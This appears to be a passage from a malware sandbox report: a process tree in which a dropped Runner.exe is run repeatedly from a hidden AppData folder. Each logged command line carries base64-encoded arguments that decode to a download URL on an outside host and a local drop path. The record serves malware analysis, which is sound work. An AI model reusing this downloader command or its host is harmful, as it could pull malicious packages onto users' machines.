- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2956
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2476
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2696
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2000
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1816
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1444
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2792
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:776
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1736
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2068
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1564
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1264
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1036
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1820
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1504
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:884
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1592
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2620
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2196
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2748
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2468
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2472
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2484
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2972
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2248
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1276
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1284
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1864
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2884
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:720
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:672
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:544
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:984
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
